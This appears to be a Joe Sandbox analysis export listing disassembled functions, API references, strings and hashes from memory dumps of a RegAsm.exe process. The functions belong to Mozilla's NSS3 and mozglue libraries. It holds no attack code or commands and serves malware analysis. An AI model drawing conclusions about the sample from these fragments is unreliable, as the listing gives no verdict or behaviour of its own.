Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$nl
API String ID: 1003633598-2972293871
Opcode ID: 85cb2f6444ca8c8c8c9faf7a3dba3df7ff5a178095313ee51db896f7c2a07fc3
Instruction ID: 93d22ea234c4e8e8427a044be61d205ab9c0b7aebb4601afdbffc6cd287838bc
Opcode Fuzzy Hash: 85cb2f6444ca8c8c8c9faf7a3dba3df7ff5a178095313ee51db896f7c2a07fc3
Instruction Fuzzy Hash: 9651E276A01104AFDB119F51ED48F9F7BB6EB5230CF544069F9087BA22D7319918CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CD575C2,00000000,00000000,00000001), ref: 6CDA5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CD575C2,00000000), ref: 6CDA5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CDA505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CDA5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDA5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDA50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CDA50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CD575C2), ref: 6CDA50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CDA50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDA50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDA5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDA511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDA512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDA5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CDA5153
free.MOZGLUE(?), ref: 6CDA516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CDA517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CDA5195

Strings

nss=, xrefs: 6CDA5083
name=, xrefs: 6CDA5057
parameters=, xrefs: 6CDA506B
config=, xrefs: 6CDA509B
library=, xrefs: 6CDA5043

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: c1cb4dfaa8962c13f00e171ac1991b1b05016467b48cf0fc7f3055308209bbeb
Instruction ID: c1bb70a25ee8cf66dbb3e0e91a3826baee37f29a7a304e10a0e6dde58c10210b
Opcode Fuzzy Hash: c1cb4dfaa8962c13f00e171ac1991b1b05016467b48cf0fc7f3055308209bbeb
Instruction Fuzzy Hash: 4851E5B1B01605ABEB00DF64DC41AAF37B8AF06248F140025FC59E7751FB25E91ACBB6

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CD94F51,00000000), ref: 6CDA4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CD94F51,00000000), ref: 6CDA4C5B
PR_smprintf.NSS3(6CE7AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CD94F51,00000000), ref: 6CDA4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CD94F51,00000000), ref: 6CDA4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CDA4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CDA4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CDA4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CD94F51,00000000), ref: 6CDA4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CD94F51,00000000), ref: 6CDA4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CDA4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CDA4DA2
free.MOZGLUE(?), ref: 6CDA4DB9
free.MOZGLUE(00000000), ref: 6CDA4DCF

Strings

%s,%s, xrefs: 6CDA4C4B
rust, xrefs: 6CDA4D22
every, xrefs: 6CDA4CA1
rootFlags, xrefs: 6CDA4D47
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CDA4D9D
slotFlags, xrefs: 6CDA4D34
timeout, xrefs: 6CDA4C91
ootT, xrefs: 6CDA4D1A
any, xrefs: 6CDA4C96
0x%08lx=[%s %s], xrefs: 6CDA4D80

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 4c399b97cc4cedf609a78119ddc4a25b35017e8f1327e0f73ad6c2a8956e2a78
Instruction ID: dd0a8a283c0c08193c35e8fdc4c80895e548b6939744873e0803a3652676db06
Opcode Fuzzy Hash: 4c399b97cc4cedf609a78119ddc4a25b35017e8f1327e0f73ad6c2a8956e2a78
Instruction Fuzzy Hash: 1441BFB2900141ABDF129FA4DC41ABB3A75AF8234CF684124EC1A1B711EB35D826C7F3

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBD4A68), ref: 6CC0945E
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC09470
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC09482
Part of subcall function 6CC09420: __Init_thread_footer.LIBCMT ref: 6CC0949F

GetCurrentThreadId.KERNEL32 ref: 6CC0F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6CC0F8F9

Part of subcall function 6CBD6390: GetCurrentThreadId.KERNEL32 ref: 6CBD63D0
Part of subcall function 6CBD6390: AcquireSRWLockExclusive.KERNEL32 ref: 6CBD63DF
Part of subcall function 6CBD6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6CBD640E

ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0F93A
GetCurrentThreadId.KERNEL32 ref: 6CC0F98A
GetCurrentThreadId.KERNEL32 ref: 6CC0F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC0F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC0F716

Part of subcall function 6CC094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC094EE
Part of subcall function 6CC094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC09508

Part of subcall function 6CBCB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6CBCB5E0

GetCurrentThreadId.KERNEL32 ref: 6CC0F739
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0F746
GetCurrentThreadId.KERNEL32 ref: 6CC0F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CC4385B,00000002,?,?,?,?,?), ref: 6CC0F829
free.MOZGLUE(?,?,00000000,?), ref: 6CC0F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6CC0F866
free.MOZGLUE(?), ref: 6CC0FA0C

Part of subcall function 6CBD5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CBD55E1), ref: 6CBD5E8C
Part of subcall function 6CBD5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CBD5E9D
Part of subcall function 6CBD5E60: GetCurrentThreadId.KERNEL32 ref: 6CBD5EAB
Part of subcall function 6CBD5E60: GetCurrentThreadId.KERNEL32 ref: 6CBD5EB8
Part of subcall function 6CBD5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CBD5ECF
Part of subcall function 6CBD5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6CBD5F27
Part of subcall function 6CBD5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6CBD5F47
Part of subcall function 6CBD5E60: GetCurrentProcess.KERNEL32 ref: 6CBD5F53
Part of subcall function 6CBD5E60: GetCurrentThread.KERNEL32 ref: 6CBD5F5C
Part of subcall function 6CBD5E60: GetCurrentProcess.KERNEL32 ref: 6CBD5F66
Part of subcall function 6CBD5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CBD5F7E

free.MOZGLUE(?), ref: 6CC0F9C5
free.MOZGLUE(?), ref: 6CC0F9DA

Strings

" attempted to re-register as ", xrefs: 6CC0F858
[D %d/%d] profiler_register_thread(%s), xrefs: 6CC0F71F
Thread , xrefs: 6CC0F789
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6CC0F9A6

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 9036b7bdab8d54474de9db1055a09b55f2835164278d8ebdd06f35f36482f354
Instruction ID: dc637fd3ef4b896e0f7374ca8a9be9f12ce18dd71541c1ec3795c8ae1ef41481
Opcode Fuzzy Hash: 9036b7bdab8d54474de9db1055a09b55f2835164278d8ebdd06f35f36482f354
Instruction Fuzzy Hash: 518101717046409FDB00EF24C840BAEB7B5EFC5308F44856DE8499BB51FB31A889CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBD4A68), ref: 6CC0945E
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC09470
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC09482
Part of subcall function 6CC09420: __Init_thread_footer.LIBCMT ref: 6CC0949F

GetCurrentThreadId.KERNEL32 ref: 6CC0EE60
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0EE6D
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC0EEA5
CloseHandle.KERNEL32(?), ref: 6CC0EEB4
free.MOZGLUE(00000000), ref: 6CC0EEBB
GetCurrentThreadId.KERNEL32 ref: 6CC0EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC0EECF

Part of subcall function 6CC0DE60: GetCurrentThreadId.KERNEL32 ref: 6CC0DE73
Part of subcall function 6CC0DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CBD4A68), ref: 6CC0DE7B
Part of subcall function 6CC0DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CBD4A68), ref: 6CC0DEB8
Part of subcall function 6CC0DE60: free.MOZGLUE(00000000,?,6CBD4A68), ref: 6CC0DEFE
Part of subcall function 6CC0DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC0DF38

Part of subcall function 6CBFCBE8: GetCurrentProcess.KERNEL32(?,6CBC31A7), ref: 6CBFCBF1
Part of subcall function 6CBFCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CBC31A7), ref: 6CBFCBFA

GetCurrentThreadId.KERNEL32 ref: 6CC0EF1E
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0EF2B
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0EF59
GetCurrentThreadId.KERNEL32 ref: 6CC0EFB0
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0EFBD
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0EFE1
GetCurrentThreadId.KERNEL32 ref: 6CC0EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC0F000

Part of subcall function 6CC094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC094EE
Part of subcall function 6CC094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC09508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC0F02F

Part of subcall function 6CC0F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC0F09B
Part of subcall function 6CC0F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC0F0AC
Part of subcall function 6CC0F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC0F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6CC0EED7
[I %d/%d] profiler_pause, xrefs: 6CC0F008

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 81d45913c6b8272c7e02e92f15f1b7810c0c3e29330218d2311c25d6a77ab0e2
Instruction ID: b39f693c9f91907705fdf1013fef939ee60648d9fe608d5ae3f3691edc8f0454
Opcode Fuzzy Hash: 81d45913c6b8272c7e02e92f15f1b7810c0c3e29330218d2311c25d6a77ab0e2
Instruction Fuzzy Hash: 665136357006149FDB00BB69D418BAA7BB4EB8632CF14C669E92583F40FF724808C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 6CD82D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CD82DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CD82E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CD82E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CD82E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CD54F1C,?,-00000001,00000000,?), ref: 6CD82E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CD54F1C,?,-00000001,00000000), ref: 6CD82E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CD82EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CD82EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CD82EF8
PR_Unlock.NSS3(?), ref: 6CD82F62
TlsGetValue.KERNEL32 ref: 6CD82F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CD82F9E
PR_Unlock.NSS3(?), ref: 6CD82FCA
TlsGetValue.KERNEL32 ref: 6CD8301A
EnterCriticalSection.KERNEL32(?), ref: 6CD8302E
PR_Unlock.NSS3(?), ref: 6CD83066
PR_SetError.NSS3(00000000,00000000), ref: 6CD83085
PR_Unlock.NSS3(?), ref: 6CD830EC
TlsGetValue.KERNEL32 ref: 6CD8310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CD83124
PR_Unlock.NSS3(?), ref: 6CD8314C

Part of subcall function 6CD69180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CD9379E,?,6CD69568,00000000,?,6CD9379E,?,00000001,?), ref: 6CD6918D
Part of subcall function 6CD69180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CD9379E,?,6CD69568,00000000,?,6CD9379E,?,00000001,?), ref: 6CD691A0

Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307AD
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307CD
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307D6
Part of subcall function 6CD307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CCC204A), ref: 6CD307E4
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,6CCC204A), ref: 6CD30864
Part of subcall function 6CD307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CD30880
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,6CCC204A), ref: 6CD308CB
Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(?,?,6CCC204A), ref: 6CD308D7
Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(?,?,6CCC204A), ref: 6CD308FB

PR_SetError.NSS3(00000000,00000000), ref: 6CD8316D

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: ad62126c7b569e502333e22f274bea62d191e31e42e9a08cd301d1ad39227829
Instruction ID: 6fcd589a1aaf3f2fb1238b5313bb5f0ddb1a47d2968dbca258fb848aa40d52b3
Opcode Fuzzy Hash: ad62126c7b569e502333e22f274bea62d191e31e42e9a08cd301d1ad39227829
Instruction Fuzzy Hash: 0AF17DB1E01608DFDF01DFA4D884A9EBBB5BF09318F144169EC09A7721EB31E995CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CD76D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CD76D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD76DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD76DC3

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD76DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CD76DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CD76E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CD76E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CD76E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CD76EB9

Strings

(CK_INVALID_HANDLE), xrefs: 6CD76DBC
hSession = 0x%x, xrefs: 6CD76D9E, 6CD76DAE
*pulDigestLen = 0x%x, xrefs: 6CD76EB4
nl, xrefs: 6CD76E61, 6CD76E95
pDigest = 0x%p, xrefs: 6CD76E27
ulDataLen = %d, xrefs: 6CD76E0E
C_Digest, xrefs: 6CD76D81
pData = 0x%p, xrefs: 6CD76DF5
pulDigestLen = 0x%p, xrefs: 6CD76E42

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nl
API String ID: 1003633598-3437320797
Opcode ID: 91ebeb0e3ca6d009bdc0585b567512560974a54f156382ffb3a0ab652a89c68b
Instruction ID: 5b0c18b77de10cb497598fd5f7222aec5dfa91815b79973fe154122d42edec64
Opcode Fuzzy Hash: 91ebeb0e3ca6d009bdc0585b567512560974a54f156382ffb3a0ab652a89c68b
Instruction Fuzzy Hash: 9B41DB76A011049FDB119F55DD48A8E3BB1EB9231CF548054F809A7A21DB31D859CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD86CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CD86910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CD86943
Part of subcall function 6CD86910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CD86957
Part of subcall function 6CD86910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CD86972
Part of subcall function 6CD86910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CD86983
Part of subcall function 6CD86910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CD869AA
Part of subcall function 6CD86910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CD869BE
Part of subcall function 6CD86910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CD869D2
Part of subcall function 6CD86910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CD869DF
Part of subcall function 6CD86910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CD86A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CD86D8C
free.MOZGLUE(00000000), ref: 6CD86DC5
free.MOZGLUE(?), ref: 6CD86DD6
free.MOZGLUE(?), ref: 6CD86DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CD86E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD86E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD86E72
free.MOZGLUE(?), ref: 6CD86EA7
free.MOZGLUE(?), ref: 6CD86EC4
